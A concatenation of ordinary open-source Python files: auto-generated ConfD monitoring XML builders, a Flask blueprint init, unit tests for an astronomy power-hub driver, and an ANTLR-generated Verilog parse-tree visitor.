"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
filename = ET.SubElement(datastore, "filename")
filename.text = kwargs.pop('filename')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_disk_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
disk_size = ET.SubElement(datastore, "disk-size")
disk_size.text = kwargs.pop('disk_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_ram_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
ram_size = ET.SubElement(datastore, "ram-size")
ram_size.text = kwargs.pop('ram_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_read_locks(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
read_locks = ET.SubElement(datastore, "read-locks")
read_locks.text = kwargs.pop('read_locks')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_lock_set = ET.SubElement(datastore, "write-lock-set")
write_lock_set.text = kwargs.pop('write_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_subscription_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
subscription_lock_set = ET.SubElement(datastore, "subscription-lock-set")
subscription_lock_set.text = kwargs.pop('subscription_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_waiting_for_replication_sync(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
waiting_for_replication_sync = ET.SubElement(datastore, "waiting-for-replication-sync")
waiting_for_replication_sync.text = kwargs.pop('waiting_for_replication_sync')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
priority = ET.SubElement(pending_subscription_sync, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
notification = ET.SubElement(pending_subscription_sync, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_time_remaining(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
time_remaining = ET.SubElement(pending_subscription_sync, "time-remaining")
time_remaining.text = kwargs.pop('time_remaining')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
priority = ET.SubElement(notification, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
name = ET.SubElement(client, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_info(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
info = ET.SubElement(client, "info")
info.text = kwargs.pop('info')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
type = ET.SubElement(client, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
datastore = ET.SubElement(client, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_lock(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
lock = ET.SubElement(client, "lock")
lock.text = kwargs.pop('lock')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
datastore = ET.SubElement(subscription, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_twophase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
twophase = ET.SubElement(subscription, "twophase")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
priority = ET.SubElement(subscription, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
id = ET.SubElement(subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
path = ET.SubElement(subscription, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
error = ET.SubElement(subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
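Every generated method above follows one pattern: build an ElementTree skeleton top-down, pop the leaf value out of `kwargs`, and hand the finished `config` element to a callback. A minimal standalone sketch of that pattern (the function name and default callback here are illustrative, not part of the generated API):

```python
import xml.etree.ElementTree as ET

def build_cdb_client_name(name, callback=ET.tostring):
    # Mirror of the generated builder pattern: nest elements top-down,
    # set the leaf text, then delegate serialisation to the callback.
    config = ET.Element("config")
    confd_state = ET.SubElement(config, "confd-state",
                                xmlns="http://tail-f.com/yang/confd-monitoring")
    internal = ET.SubElement(confd_state, "internal")
    cdb = ET.SubElement(internal, "cdb")
    client = ET.SubElement(cdb, "client")
    leaf = ET.SubElement(client, "name")
    leaf.text = name
    return callback(config)

xml_bytes = build_cdb_client_name("my-client")
```

With the default callback this yields the serialised bytes of the whole `<config>` tree, which is exactly what the real methods pass to `self._callback`.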
# File: app/modules/passport/__init__.py (repo: Eastwu5788/Heron, license: Apache-2.0)
from flask import Blueprint
passport = Blueprint('passport', __name__)
from . import login
from . import login_mobile
from . import register_mobile
from . import logout
# File: plugins/datafaker/datafaker/tests/test_richtext_creation.py (repo: rafalp/misago-local-dev, license: BSD-2-Clause)
from ..richtext import create_fake_rich_text
def test_fake_rich_text_is_created():
assert create_fake_rich_text()
# File: tests/unit_tests/logic/powerswitch/test_pegasusUPBIndi.py (repo: mworion/MountWizzard4, license: Apache-2.0)
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
#
# written in python3, (c) 2019-2021 by mworion
#
# Licence APL2.0
#
###########################################################
# standard libraries
import pytest
import unittest.mock as mock
# external packages
from PyQt5.QtCore import QThreadPool
from PyQt5.QtCore import QObject
from PyQt5.QtCore import pyqtSignal
from indibase.indiBase import Device, Client
# local import
from logic.powerswitch.pegasusUPBIndi import PegasusUPBIndi
from base.driverDataClass import Signals
from base.indiClass import IndiClass
@pytest.fixture(autouse=True, scope='function')
def module_setup_teardown():
class Test(QObject):
threadPool = QThreadPool()
message = pyqtSignal(str, int)
global app
app = PegasusUPBIndi(app=Test(), signals=Signals(), data={})
yield
def test_setUpdateConfig_1():
app.deviceName = ''
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_2():
app.deviceName = 'test'
app.device = None
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_3():
app.deviceName = 'test'
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'Test': 1}):
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_4():
app.deviceName = 'test'
app.device = Device()
app.UPDATE_RATE = 1
with mock.patch.object(app.device,
'getNumber',
return_value={'PERIOD': 1}):
suc = app.setUpdateConfig('test')
assert suc
def test_setUpdateConfig_5():
app.deviceName = 'test'
app.device = Device()
app.client = Client()
app.UPDATE_RATE = 0
with mock.patch.object(app.device,
'getNumber',
return_value={'PERIOD': 1}):
with mock.patch.object(app.client,
'sendNewNumber',
return_value=False):
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_6():
app.deviceName = 'test'
app.device = Device()
app.client = Client()
app.UPDATE_RATE = 0
with mock.patch.object(app.device,
'getNumber',
return_value={'PERIOD': 1}):
with mock.patch.object(app.client,
'sendNewNumber',
return_value=True):
suc = app.setUpdateConfig('test')
assert suc
def test_updateText_1():
suc = app.updateText('test', 'test')
assert not suc
def test_updateText_2():
app.data = {'AUTO_DEW.DEW_C': 1,
'VERSION.UPB': 1}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'test')
assert not suc
def test_updateText_3():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPB',
'FIRMWARE_INFO.VERSION': '1.4'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateText_4():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPBv2',
'FIRMWARE_INFO.VERSION': '1.5'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateText_5():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPBv2',
'FIRMWARE_INFO.VERSION': '1.4'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateText_6():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPB',
'FIRMWARE_INFO.VERSION': '1.5'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateNumber_1():
suc = app.updateNumber('test', 'test')
assert not suc
def test_updateNumber_2():
app.data = {'AUTO_DEW.DEW_C': 1,
'VERSION.UPB': 1}
with mock.patch.object(IndiClass,
'updateNumber',
return_value=True):
suc = app.updateNumber('test', 'test')
assert suc
def test_updateSwitch_1():
suc = app.updateSwitch('test', 'test')
assert not suc
def test_updateSwitch_2():
app.data = {'AUTO_DEW.AUTO_DEW_ENABLED': 1,
'VERSION.UPB': 2}
with mock.patch.object(IndiClass,
'updateSwitch',
return_value=True):
suc = app.updateSwitch('test', 'test')
assert suc
def test_togglePowerPort_1():
suc = app.togglePowerPort()
assert not suc
def test_togglePowerPort_2():
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_CONTROL_0': 'On'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_CONTROL_1': 'On'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'OUTLET_1': 'On'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_6():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'OUTLET_1': 'Off'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPortBoot_1():
suc = app.togglePowerPortBoot()
assert not suc
def test_togglePowerPortBoot_2():
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_0': 'On'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'On'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'On'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_6():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'Off'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_7():
app.device = Device()
app.isINDIGO = False
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'Off'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_toggleHubUSB_1():
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_2():
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 'On'}):
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'Off'}):
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'Off'}):
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_6():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'Off',
'INDI_DISABLED': 'On'}):
suc = app.toggleHubUSB()
assert not suc
def test_togglePortUSB_1():
suc = app.togglePortUSB()
assert not suc
def test_togglePortUSB_2():
suc = app.togglePortUSB(port='1')
assert not suc
def test_togglePortUSB_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_1': 'On'}):
suc = app.togglePortUSB(port='1')
assert not suc
def test_togglePortUSB_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_1': 'On'}):
suc = app.togglePortUSB(port='0')
assert not suc
def test_togglePortUSB_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_1': 'On'}):
suc = app.togglePortUSB(port='0')
assert not suc
def test_togglePortUSB_6():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_0': 'Off'}):
suc = app.togglePortUSB(port='0')
assert not suc
def test_toggleAutoDew_1():
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_2():
app.device = Device()
app.modelVersion = 1
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_2b():
app.device = Device()
app.modelVersion = 0
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_5():
app.device = Device()
app.modelVersion = 1
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'Off',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_6():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'MANUAL': 'On',
'AUTOMATIC': 'Off',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_7():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'MANUAL': 'Off',
'AUTOMATIC': 'Off',
'DEW_A': 'Off',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_8():
app.device = Device()
app.modelVersion = 1
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'Off',
'INDI_DISABLED': 'On',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_9():
app.device = Device()
app.modelVersion = 2
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'Off',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_sendDew_1():
suc = app.sendDew()
assert not suc
def test_sendDew_2():
suc = app.sendDew(port=1)
assert not suc
def test_sendDew_3():
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'DEW_1': 50}):
suc = app.sendDew(port=1)
assert not suc
def test_sendDew_4():
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'DEW_1': 50}):
suc = app.sendDew(port='A')
assert not suc
def test_sendDew_5():
app.device = Device()
app.isINDIGO = 'On'
with mock.patch.object(app.device,
'getNumber',
return_value={'OUTLET_1': 50}):
suc = app.sendDew(port='A')
assert not suc
def test_sendAdjustableOutput_1():
suc = app.sendAdjustableOutput()
assert not suc
def test_sendAdjustableOutput_2():
suc = app.sendAdjustableOutput()
assert not suc
def test_sendAdjustableOutput_3():
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'ADJUSTABLE_VOLTAGE': 12}):
suc = app.sendAdjustableOutput()
def test_sendAdjustableOutput_4():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getNumber',
return_value={'ADJUSTABLE_VOLTAGE': 12}):
suc = app.sendAdjustableOutput()
assert not suc
def test_reboot_1():
suc = app.reboot()
assert not suc
def test_reboot_2():
app.device = Device()
suc = app.reboot()
assert not suc
def test_reboot_3():
app.device = Device()
app.isINDIGO = True
suc = app.reboot()
assert not suc
def test_reboot_4():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'REBOOT': 'On'}):
suc = app.reboot()
assert not suc
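The tests above lean on a single idiom: patch a method on the device object so the code under test sees a canned return value instead of talking to hardware. A dependency-free illustration of that idiom with `unittest.mock` (the `FakeDevice` class and `toggle` helper are invented for the demo; they only mimic the shape of the real `Device.getSwitch` interaction):

```python
import unittest.mock as mock

class FakeDevice:
    # Minimal stand-in for indibase's Device used throughout the tests above.
    def getSwitch(self, name):
        raise RuntimeError("would talk to real hardware")

def toggle(device):
    # Toggle logic in the style of togglePowerPort: read the switch
    # dictionary, invert the state of the targeted port, report it.
    switches = device.getSwitch('POWER_CONTROL')
    return 'Off' if switches['POWER_CONTROL_1'] == 'On' else 'On'

dev = FakeDevice()
with mock.patch.object(dev, 'getSwitch',
                       return_value={'POWER_CONTROL_1': 'On'}):
    new_state = toggle(dev)
```

Inside the `with` block every call to `dev.getSwitch(...)` returns the canned dictionary, so `toggle` flips the port to `'Off'` without any hardware present; outside the block the original method is restored.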
# File: verpy/parser/VerexVisitor.py (repo: bynoud/verpy, license: MIT)
# Generated from Verex.g4 by ANTLR 4.7.1
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by VerexParser.
class VerexVisitor(ParseTreeVisitor):
# Visit a parse tree produced by VerexParser#vfile.
def visitVfile(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#description.
def visitDescription(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_declaration.
def visitModule_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#integer_declaration.
def visitInteger_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#integer_kw.
def visitInteger_kw(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#HeaderPortName.
def visitHeaderPortName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#HeaderPortAssign.
def visitHeaderPortAssign(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_reference.
def visitPort_reference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_declaration.
def visitPort_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_port_identifiers_wrange.
def visitList_of_port_identifiers_wrange(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_identifier_wrange.
def visitPort_identifier_wrange(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#local_parameter_declaration.
def visitLocal_parameter_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_declaration_.
def visitParameter_declaration_(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_declaration.
def visitNet_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_net_identifiers.
def visitList_of_net_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_identifier_wrange.
def visitNet_identifier_wrange(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_lvalue.
def visitNet_lvalue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_concatenation_value.
def visitNet_concatenation_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_lvalue.
def visitVariable_lvalue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inc_or_dec_expression.
def visitInc_or_dec_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#primary.
def visitPrimary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierid_reference.
def visitHierid_reference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#escaped_hierarchical_identifier.
def visitEscaped_hierarchical_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_hierarchical_identifier.
def visitSimple_hierarchical_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#conditional_statement.
def visitConditional_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#stat_if.
def visitStat_if(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#stat_elseif.
def visitStat_elseif(self, ctx):
return self.visitChildren(ctx)
